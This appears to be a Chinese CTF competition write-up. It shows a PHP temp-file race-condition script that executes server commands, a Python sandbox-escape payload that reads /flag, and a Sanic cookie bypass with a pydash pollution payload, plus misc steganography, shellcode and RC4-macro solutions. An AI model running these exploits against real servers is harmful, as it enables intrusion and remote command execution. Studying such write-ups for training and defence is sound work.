重温经典，在短短两天之内让人感觉到全国CTF水平大幅度提升，题都是几百支队伍随便杀，为国内CTF整体水平的迅猛提升感到高兴

Web

Simple_php

• 条件竞争打临时文件，php反弹shell

import requests
import threading
import re

url = "url"

proxies = {"http": None}

def upoadFile():
    file = {"files": open("e.php")}
    data = {"cmd": "du -a /"}
    res = requests.post(url, files=file, data=data)
    r = re.findall("(/tmp/php.*)", res.text)
    # print(r)
    if r and r[0] != '' and r[0] != '/tmp/php':
        print("php " + r[0])
        exec("php " + r[0])
    # print(res.text)
    
def getPhp():
    
    data = {"cmd": "du -lh --max-depth=1 -a /tmp"}
    res = requests.post(url, data=data)
    r = re.findall("(/tmp/php.*)", res.text)
    # print(r)
    if r and r[0] != '' and r[0] != '/tmp/php':
        print("php " + r[0])
        exec("php " + r[0])
    
def exec(cmd):
    data = {"cmd": cmd}
    res = requests.post(url, data=data)
    print(res.text)

if __name__ == "__main__":
    for i in range(5):
        threading.Thread(target=getPhp).start()
        threading.Thread(target=upoadFile).start()

mossfern

• 改改L3HCTF的payload即可

builtins = [a:=[],d:=a.append,d([b.gi_frame.f_back.f_back.f_globals]for b in a),*a[0]][-1][0]["_""_builtins_""_"]
eval = builtins.eval
flag = eval("_""_import_""_('os').popen('cat /flag').read()", {"_""_builtins_""_": builtins})
print(flag[::-1])

sanic

• src

from sanic import Sanic
from sanic.response import text, html
from sanic_session import Session
import pydash
# pydash==5.1.2


class Pollute:
    def __init__(self):
        pass


app = Sanic(__name__)
app.static("/static/", "./static/")
Session(app)


@app.route('/', methods=['GET', 'POST'])
async def index(request):
    return html(open('static/index.html').read())


@app.route("/login")
async def login(request):
    user = request.cookies.get("user")
    if user.lower() == 'adm;n':
        request.ctx.session['admin'] = True
        return text("login success")

    return text("login fail")


@app.route("/src")
async def src(request):
    return text(open(__file__).read())


@app.route("/admin", methods=['GET', 'POST'])
async def admin(request):
    if request.ctx.session.get('admin') == True:
        key = request.json['key']
        value = request.json['value']
        if key and value and type(key) is str and '_.' not in key:
            pollute = Pollute()
            pydash.set_(pollute, key, value)
            return text("success")
        else:
            return text("forbidden")

    return text("forbidden")


if __name__ == '__main__':
    app.run(host='0.0.0.0')

• 审计sanic源码，通过八进制绕过cookie，

COOKIE_NAME_RESERVED_CHARS = re.compile(
    '[\x00-\x1F\x7F-\xFF()<>@,;:\\\\"/[\\]?={} \x09]'
)
OCTAL_PATTERN = re.compile(r"\\[0-3][0-7][0-7]")
QUOTE_PATTERN = re.compile(r"[\\].")

Cookie: user="adm\073n"

• 审计pydash，绕过过滤__.

def to_path_tokens(value):
    """Parse `value` into :class:`PathToken` objects."""
    if pyd.is_string(value) and ("." in value or "[" in value):
        # Since we can't tell whether a bare number is supposed to be dict key or a list index, we
        # support a special syntax where any string-integer surrounded by brackets is treated as a
        # list index and converted to an integer.
        keys = [
            PathToken(int(key[1:-1]), default_factory=list)
            if RE_PATH_LIST_INDEX.match(key)
            else PathToken(unescape_path_key(key), default_factory=dict)
            for key in filter(None, RE_PATH_KEY_DELIM.split(value))
        ]
    elif pyd.is_string(value) or pyd.is_number(value):
        keys = [PathToken(value, default_factory=dict)]
    elif value is UNSET:
        keys = []
    else:
        keys = value

    return keys


def unescape_path_key(key):
    """Unescape path key."""
    key = key.replace(r"\\", "\\")
    key = key.replace(r"\.", r".")
    return key

{"key":"__init__\\\\.__globals__\\\\.xxxx","value":"xxxx"}

• 此时污染__file__可任意文件读，但题目似乎最终需要RCE，最终需要列出目录，污染static的DirectoryHandler的directory_view和_parts为True和/，从cnss的✌那学来的，具体poc就不写了

Misc

通风机

• 软件题

盗版软件

• hackexe.exe运行后生成output.png，LSB隐写，R全通道，隔一个像素取一个

• 解压得到shellcode，微步分析一下得到c2地址

• 进程转储中存在多个winhack.com，拼接求MD5

神秘文件

• P1

• P2，分离出一个docx，caesar k=10

• P3，olevba分离宏，RC4

Sub crypto(sMessage, strKey)
    Dim kLen, x, y, i, j, temp
    Dim s(256), k(256)

    kLen = Len(strKey)
    For i = 0 To 255
        s(i) = i
        k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1))
    Next

    j = 0
    For i = 0 To 255
        j = (j + k(i) + s(i)) Mod 256
        temp = s(i)
        s(i) = s(j)
        s(j) = temp
    Next

    x = 0
    y = 0

    For i = 1 To 3072
        x = (x + 1) Mod 256
        y = (y + s(x)) Mod 256
        temp = s(x)
        s(x) = s(y)
        s(y) = temp
    Next

    For i = 1 To Len(sMessage)
        x = (x + 1) Mod 256
        y = (y + s(x)) Mod 256
        temp = s(x)
        s(x) = s(y)
        s(y) = temp

        crypto = crypto & (s((s(x) + s(y)) Mod 256) Xor Asc(Mid(sMessage, i, 1))) & ","
    Next
    'i13POMdzEAzHfy4dGS+vUA==(After base64)
End Sub

• P4，base64

• P5，base64

• P6，base64

• P7，rot13

• P8，教你做事

• P9

• P10，Vigenere